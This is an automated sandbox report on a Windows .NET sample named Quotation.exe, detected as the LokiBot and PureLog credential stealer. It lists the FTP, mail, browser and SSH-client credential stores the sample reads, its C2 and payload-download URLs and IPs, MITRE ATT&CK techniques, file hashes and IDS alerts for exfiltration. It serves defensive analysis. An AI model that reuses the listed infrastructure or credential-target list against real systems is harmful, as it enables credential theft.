Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		5_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		5_2_0040D069

Source: Yara match	File source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 2.0.Quotation.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1280573223.0000000000362000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation.exe	66%	ReversingLabs	Win32.Trojan.Leonem
Quotation.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://dvlref.online/BISH/PWS/fre.php	100%	Avira URL Cloud	malware
https://dvlref.online/BISH/PWS/fre.php%	0%	Avira URL Cloud	safe
https://dddotx.shop/BISH.exe8https://dddotx.shop/DLLL.dll	100%	Avira URL Cloud	malware
http://dddotx.shop	100%	Avira URL Cloud	malware
https://dddotx.shop/BISH.exe	100%	Avira URL Cloud	malware
https://dvlref.online/BISH/PWS/fre.php	100%	Avira URL Cloud	malware
http://dddotx.shopd	0%	Avira URL Cloud	safe
https://dddotx.shop/DLLL.dll	100%	Avira URL Cloud	malware
https://dddotx.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dvlref.online	104.21.57.140	true	true		unknown
dddotx.shop	104.21.12.202	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
https://dvlref.online/BISH/PWS/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	false		high
https://dddotx.shop/DLLL.dll	false	Avira URL Cloud: malware	unknown
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
https://dddotx.shop/BISH.exe	false	Avira URL Cloud: malware	unknown
http://dvlref.online/BISH/PWS/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://dddotx.shopd	Quotation.exe, 00000002.00000002.1343184318.00000000026E9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://dddotx.shop	Quotation.exe, 00000002.00000002.1343184318.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000002.00000002.1343184318.000000000272D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dvlref.online/BISH/PWS/fre.php%	aspnet_compiler.exe, 00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quotation.exe, 00000002.00000002.1343184318.00000000026D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dddotx.shop	Quotation.exe, 00000002.00000002.1343184318.00000000026E9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dddotx.shop/BISH.exe8https://dddotx.shop/DLLL.dll	Quotation.exe, 00000002.00000002.1343184318.00000000026D2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.57.140	dvlref.online	United States		13335	CLOUDFLARENETUS	true
104.21.12.202	dddotx.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566634
Start date and time:	2024-12-02 14:45:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 43 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Quotation.exe

Simulations

Behavior and APIs

Time	Type	Description
08:46:22	API Interceptor	21x Sleep call for process: Quotation.exe modified
08:46:31	API Interceptor	68x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.12.202	https://news.aiccampaign.com/p?h=HwOLjtfiW2yHAKsD1stCKxBj7FkaC&activityId=10248378&target=https%3A%2F%2Fmofficelive.com%2FMmichael.chan@exp.com&data=05%7C01%7Cmichael.chan@exp.com%7C54305d23abf84af50b4408db8c62611f%7C4ac47f737479484a903a7c08b6270689%7C0%7C0%7C638258126396723132%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C3000%7C%7C%7C&sdata=hUx9CR5JSHAZGXMoEe4Hq7ufTz2AUdh6s2eZsz7kfJo=&reserved=0	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dddotx.shop	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	188.114.96.3
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	specification and drawing.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.159.140.104
	ship's particulars-TBN.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	https://ballynuts.gr//br/	Get hash	malicious	Unknown	Browse	104.18.11.207
	swift.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
CLOUDFLARENETUS	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	specification and drawing.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.159.140.104
	ship's particulars-TBN.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	https://ballynuts.gr//br/	Get hash	malicious	Unknown	Browse	104.18.11.207
	swift.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.12.202
	ship's particulars-TBN.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.21.12.202
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.12.202
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.12.202
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.12.202
	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse	104.21.12.202
	SPP_14667098030794_8611971920#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.12.202
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.12.202
	faktura461250706050720242711#U00b7pdf.vbs	Get hash	malicious	Unknown	Browse	104.21.12.202
	021337ISOGENERAL.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.12.202

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	50
Entropy (8bit):	1.5212424590621707
Encrypted:	false
SSDEEP:	3:/lvlp:p
MD5:	C851BF93667BDD6310D56581D955C2AE
SHA1:	8FC5AEC1542BD7471BF815632863622EFE23A834
SHA-256:	3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
SHA-512:	D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.0151405109833025
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Quotation.exe
File size:	156'160 bytes
MD5:	a6d27c830af952414ff70b257cf26948
SHA1:	691fc8feed36fc7c9b7933e1c3807e5314d40d5e
SHA256:	c7bfb04b5e314178b5d3602cbbb9e6abe716936aef501b645d7c1aa2cbeaaaf3
SHA512:	71b4304f85c7a437841a17ab91d6cb27315909157b20ce751a5e18e0f4107b08bfef5ee3cbf7633b74591a4fdc994068d55b0325b83a368d64e048a04ad39ba4
SSDEEP:	1536:gBhirc4kWBUNHUt4gML6ybLaPxNDN17RocNKlsSkrmPJf9:wirWN0fMesLaPxNP7ucN+Ari9
TLSH:	27E38035B6674721C10B4D31C0DF351C03A59F8B1AB3DA5AF98C33751AF23DB9A4AA89
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..N...........l... ........@.. ....................................`................................

File Icon


Icon Hash:	1a5ada12a98c3689

Static PE Info

General

Entrypoint:	0x416c2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9B0F1489 [Sat Jun 8 10:52:57 2052 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16be0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x10e54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16ba2	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x14c34	0x14e00	c6ab44a0a6eeead0949c08b1eb85d345	False	0.4785624064371258	data	5.728060008630081	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x10e54	0x11000	347791ee3c14adab81465ef61a82a8fa	False	0.056597541360294115	data	2.6810006337461534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0xc	0x200	5a3bd48e6ad8815475da4808c02ebeb0	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x18130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.046891636105524666
RT_GROUP_ICON	0x28958	0x14	data	1.15
RT_VERSION	0x2896c	0x2fc	data	0.43586387434554974
RT_MANIFEST	0x28c68	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T14:46:25.643320+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49701	104.21.12.202	443	TCP
2024-12-02T14:46:27.824606+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:27.824606+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:27.824606+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:29.254051+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:29.772994+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:29.772994+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:29.772994+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:31.063978+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:31.365226+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:31.365226+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:31.365226+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:32.728102+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:32.728102+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:32.848190+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49710	TCP
2024-12-02T14:46:33.110694+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:33.110694+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:33.110694+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:34.433103+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:34.433103+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:34.553112+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49716	TCP
2024-12-02T14:46:34.837853+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49722	104.21.57.140	80	TCP
